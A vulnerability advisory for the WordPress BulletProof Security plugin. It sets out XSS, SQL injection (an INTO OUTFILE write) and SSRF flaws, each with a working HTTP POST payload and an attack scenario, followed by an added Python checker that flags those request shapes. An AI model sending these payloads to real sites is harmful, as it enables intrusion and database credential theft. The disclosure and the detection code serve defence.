Headline
CVE-2014-7959: WordPress Bulletproof-Security .51 XSS / SQL Injection
SQL injection vulnerability in admin/htaccess/bpsunlock.php in the BulletProof Security plugin before .51.1 for WordPress allows remote authenticated users to execute arbitrary SQL commands via the tableprefix parameter.
Vulnerability title: WordPress bulletproof-security <= .51 multiple vulnerabilities
Author: Pietro Oliva
CVE: CVE-2014-7958, CVE-2014-7959, CVE-2014-8749
Vendor: AITpro
Product: bulletproof-security
Affected version: bulletproof-security <= .51
Vulnerabilities fixed in version: .51.1

Details:

XSS vulnerability (CVE-2014-7958):

POST /wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php HTTP/1.1

dbname=&dbuser=&dbpassword=&dbhost=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&tableprefix=&username=&Login-Security-Unlock=Unlock+User+Account

SQL injection vulnerability (CVE-2014-7959; the correct database username and password are required in order to exploit this):

POST /wordpress/wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php HTTP/1.1

dbname=information_schema&dbuser=root&dbpassword=password&dbhost=&tableprefix=tables+into+outfile+'/tmp/tables'%3b+--+&username=&Login-Security-Unlock=Unlock+User+Account

SSRF vulnerability (CVE-2014-8749):

POST /wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php HTTP/1.1

dbname=&dbuser=root&dbpassword&dbhost=remotedatabase.com&tableprefix=&username=&Login-Security-Unlock=Unlock+User+Account

Possible scenario:

- The user sends a request with username, password, host and other parameters to the vulnerable page.
- The server doesn't check that the host parameter is in a whitelist of permitted databases.
- The server performs an authentication request to a remote or internal-network database and returns the authentication result to the attacker.
- After n attempts the attacker has bypassed any access restrictions on the remote database, discovered the remote database password, and made bulletproof-security appear to be the source of the attack.

Extra step:

- If the SQL injection flaw (CVE-2014-7959) is not fixed, an attacker could also execute arbitrary SQL statements on the remote server, as the vulnerable page executes a query if the authentication is successful (without filtering or the use of prepared statements). The source of the attack would appear to be the vulnerable bulletproof-security site.
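As an added defender-side example (not code from the advisory or from the plugin), a small Python checker that decodes POST bodies shaped like the three requests above and flags each pattern: a tableprefix that is not a plain SQL identifier, a dbhost outside an allow-list, and markup characters in any field. The allow-list and the identifier rule are assumptions; the identifier rule matters because a table prefix cannot be bound as a prepared-statement parameter, so validation is the only fix for that parameter.

```python
import re
from urllib.parse import parse_qs

# Assumed allow-list of database hosts the unlock page may contact; the
# vulnerable plugin performed no such check (CVE-2014-8749).
ALLOWED_DB_HOSTS = {"localhost", "127.0.0.1"}
# A WordPress table prefix is an SQL identifier fragment, so it can be
# validated strictly: letters, digits and underscore only.
IDENT_RE = re.compile(r"[A-Za-z0-9_]{0,32}")
MARKUP_RE = re.compile(r"""[<>"']""")

def parse_unlock_request(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    params = parse_qs(body, keep_blank_values=True)
    return {k: v[0] for k, v in params.items()}

def classify(params: dict) -> list:
    """Return the names of the risky patterns found in one request."""
    findings = []
    prefix = params.get("tableprefix", "")
    if not IDENT_RE.fullmatch(prefix):
        findings.append("tableprefix-not-identifier")  # CVE-2014-7959 shape
    host = params.get("dbhost", "")
    if host and host not in ALLOWED_DB_HOSTS:
        findings.append("dbhost-not-allowlisted")  # CVE-2014-8749 shape
    for key in ("dbhost", "dbname", "dbuser", "tableprefix", "username"):
        if MARKUP_RE.search(params.get(key, "")):
            findings.append(f"{key}-markup-chars")  # CVE-2014-7958 shape
    return findings

def safe_table(prefix: str, table: str) -> str:
    """Validate prefix and table as identifiers, then backtick-quote them."""
    if not IDENT_RE.fullmatch(prefix) or not IDENT_RE.fullmatch(table):
        raise ValueError("table prefix or name is not a plain identifier")
    return f"`{prefix}{table}`"

# Constructed sample bodies shaped like the advisory's requests.
SAMPLES = {
    "benign": "dbname=wp&dbuser=wp&dbpassword=x&dbhost=localhost&tableprefix=wp_&username=admin",
    "xss": "dbname=&dbuser=&dbpassword=&dbhost=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&tableprefix=&username=",
    "sqli": "dbname=information_schema&dbuser=root&dbpassword=password&dbhost=&tableprefix=tables+into+outfile+'/tmp/tables'%3b+--+&username=",
    "ssrf": "dbname=&dbuser=root&dbpassword&dbhost=remotedatabase.com&tableprefix=&username=",
}

def scan_samples() -> dict:
    """Classify every constructed sample; used by the self-check below."""
    return {name: classify(parse_unlock_request(body)) for name, body in SAMPLES.items()}

if __name__ == "__main__":
    for name, findings in scan_samples().items():
        print(f"{name:7s} -> {findings or ['clean']}")
```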